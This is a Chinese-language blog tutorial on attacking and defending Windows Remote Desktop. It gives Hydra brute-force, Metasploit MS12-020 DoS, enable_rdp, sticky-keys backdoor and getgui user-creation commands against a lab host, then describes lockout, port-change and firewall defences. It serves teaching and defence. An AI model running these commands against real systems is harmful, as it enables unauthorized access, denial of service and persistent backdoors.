远程桌面(RDP)上的渗透测试技巧和防御

 

0x00 前言

在本文中,我们将讨论四种情况下的远程桌面渗透测试技巧方法。通过这种攻击方式,我们试图获取攻击者如何在不同情况下攻击目标系统,以及管理员在激活RDP服务时来抵御攻击时应采取哪些主要的防御手段。远程桌面协议(RDP也称为终端服务客户端,是Microsoft开发的专有协议,为用户提供通过网络连接远程登录到另一台计算机的图形界面。RDP服务器内置于Windows操作系统中默认情况下,服务器监听TCP  端口3389 

0x01  RDP服务攻击

1.RDP暴力破解攻击

让我们开始吧!

假设admin已允许其系统中的远程桌面服务进行本地网络连接。

1.1使用nmap扫描RDP

攻击者可以借助nmap来验证端口3389是否被打开。对于RDP渗透,我们还使用nmap来扫描目标系统(192.168.0.102)以获取开放式RDP的端口。

nmap -p 3389 192.168.0.102

如果允许远程桌面服务,则nmap将显示OPEN作为端口3389的状态,如下图所示:

 

1.2.RDP进行暴力攻击

为了与RDP连接,我们总是需要登录凭证作为经过身份验证的连接。有效用户凭证可以输入它的用户名和密码,但无效用户(攻击者)无法猜出正确的登录凭据,因此需要通过暴力攻击来获取登录凭证。

我们正在使用hydra来展示对RDP进行暴力攻击。Hydra:它是一个并行登录破解程序,支持多种协议攻击。它非常快速灵活,新模块易于添加。在kali Linux中打开终端并输入以下命令:

Hydra -v -f -L /root/Desktop/user.txt -P /root/Desktop/dict.txt rdp//192.168.0.102

从下面的截图中可以看到正确地获取到用户名:ignite和密码:123456,我们通过端口3389上的暴力攻击检索到。使用此凭据攻击者可以登录远程桌面服务。

 

2.扫描端口3389以进行DOS攻击

很多时候,为了确定主机是否容易受到RDP攻击,攻击者使用MS12-020检查来测试其漏洞。在kali Linux下的metasploit框架中打开命令终端,现在键入以下命令来扫描漏洞

use auxiliary/scanner/rdp/ms12_020_check

msf auxiliary(ms12_020_check) > set rhosts 192.168.0.102

msf auxiliary(ms12_020_check) >set rport 3389

msf auxiliary(ms12_020_check) > exploit

从下列截图中可以看出目标是易受攻击的,现在你可以使用谷歌找到它的攻击漏洞的poc.

一旦攻击知道目标端口3389易受到MS12-020-攻击的漏洞,那么将尝试使用Ms12-020_maxchannelids进行攻击。这将对目标系统发起DOS攻击。

现在键入以下命令进行DOS攻击,这将导致目标系统蓝屏

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.0.102

msf auxiliary(ms12_020_maxchannelids) > set rhost 3389

msf auxiliary(ms12_020_maxchannelids) > exploit

从如下图所示中,可以看到目标是由于某些问题导致系统正在关闭。

DoS攻击执行者通常攻击以托管在诸如银行或信用卡支付网关等高端Web服务器上的站点或服务作为目标,通过暂时或无限期地中断连接Internet的主机服务,使其目标用户无法使用机器或网络资源。

3.在受害者PC中启用RDP

如果攻击者攻击了未启用RDP服务的受害者系统,则攻击者自己可以使用由Rapid 7metasploit内部构建的后渗透模块来开启RDP服务。 

现在要执行此操作,我们必须需要一个目标系统的反弹shell。从如下图所示中,您可以看到已经获取了目标系统的反弹shell.

这里我们获得了meterpreter的会话1,并通过bypass的会话2获得管理权限。

现在键入以下命令以生成后渗透反弹shell用以启用RDP服务

use post/windows/manage/enable_rdp

msf post(enable_rdp) > sessions

msf post(enable_rdp) >exploit

此模块可以将“sticky key”攻击应用于具有合适权限的会话中。该攻击提供了一种在RDP登录屏幕或UAC确认对话框中使用UI级别交互获取SYSTEM shell的方法

use post/windows/manage/sticky_keys

msf post(sticky_keys) > set sessions 2

msf post(sticky_keys) >exploit

现在使用以下命令连接远程桌面:

rdesktop 192.168.0.102

它会要求提交登录凭据,但我们不知道,因此我们需要发起了上面的 stick key攻击,以便我们可以通过按照如下图所示的连续按5shift键获取RDP 的命令终端。

4.另一种启用RDP的方法

当您已获取到受害主机系统的meterpreter会话后,启用RDP服务的命令以及选择的设置凭证。

Meterpreter> run getgui-e-u raaz-p 1234

从如下图所示中,你可以看到已经添加了用户名raaz密码1234  可进入远程桌面用户管理员的权限。现在您可以使用已创建的用户进行命令登录,命令如下

rdesktop 192.168.0.102

输入用户名raaz和密码1234用于登录

现在已成功远程登录系统

 

0x02 RDP攻击防御

1.添加安全策略以防止暴力破解

管理员可以使用帐户锁定策略保护其网络免受暴力破解攻击。在安全设置 > 帐户策略 > 帐户锁定策略下配置以下策略:

帐户锁定持续时间:用于定义锁定帐户保持时间段的策略,直到自动解锁或由管理员重置。当用户超过帐户锁定阈值设置的登录尝试时,它将锁定帐户指定的时间。

帐户锁定阈值:定义失败登录尝试次数的策略,将在帐户锁定持续时间指定的某段时间内锁定帐户。它将允许最大数量指定尝试登录您的帐户。

被锁账户锁定计数器:用于定义登录尝试失败后必须经过的时间段的策略。重置时间必须小于或等于帐户锁定时间。

如下实例设置

帐户锁定时间: 30分钟

帐户锁定阈值: 2次无效登录尝试

被锁帐户锁定计算器: 30分钟后

如果尝试次数大于  帐户锁定阈值,则攻击者可能会被锁定账户。

现在再次通过对端口3389进行暴力破解攻击来测试帐户锁定策略

hydra -v -f -l ignite  -P /root/Desktop/dict.txt rdp//192.168.0.102

当攻击者检索用户名和密码时,肯定会使用它们进行登录,但正如您所看到的那样,尝试破解密码需要超过2次,因此根据设置的策略,帐户应该被锁定30分钟.

让我们通过登录远程桌面来验证它。

打开命令终端并输入“rdesktop 192.168.0.102”,当获得目标屏幕时,输入已爆破检索的用户名和密码。从如下截图中,您可以看到我们已经输入上面发现的用户名和密码 ignite: 123456

当攻击者提交您的凭据时,它会显示当前帐户已被锁定且无法登录的消息,如下图所示。它锁定用户的帐户 ignit 30分钟,因此管理员知道有人一直试图非法访问远程桌面。通过这种方式,我们可以防御暴力破解攻击,防止未经授权的访问。

 

2.端口修改

您可以在另一个端口上转发端口3389以提高系统的安全性,但要在窗口操作系统中通过注册表编辑器浏览以下位置。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

从如下图所示中,您可以在右侧面板中看到端口号已被选中并单击它。

将端口从3389更改为特定端口号

您将获得一个编辑DWORD的窗口,可以在其中编辑32位值。默认情况下,它将显示d3d,它是3389的十六进制3389值替换为您选择的另一个值(如3314),并选择十六进制作为基数,将3314转换为cf2

从如下图所示,您可以看到端口3314现在被打开

3.通过系统自带防火墙保护RDP

打开具有高级设置的防火墙的面板,然后进入其内对配置入站的远程桌面(TCP-In)配置,以通过在防火墙中设置进行一些更改来添加安全过滤器。

允许来自特定IP的流量

之后,它将打开一个窗口来更改其属性,单击范围选项。在这里,您将获得两个连接类型的面板,本地远程 IP地址。 

远程IP地址中,特定IP地址选择第二个选项,并输入要允许连接远程桌面服务的IP,如下图所示:

 

它将阻止来自其他IP的所有流量,并提高网络的安全性,以抵御任何类型的攻击。

 

posted @ 2018-08-06 13:21 渗透测试中心 阅读(...) 评论(...) 编辑 收藏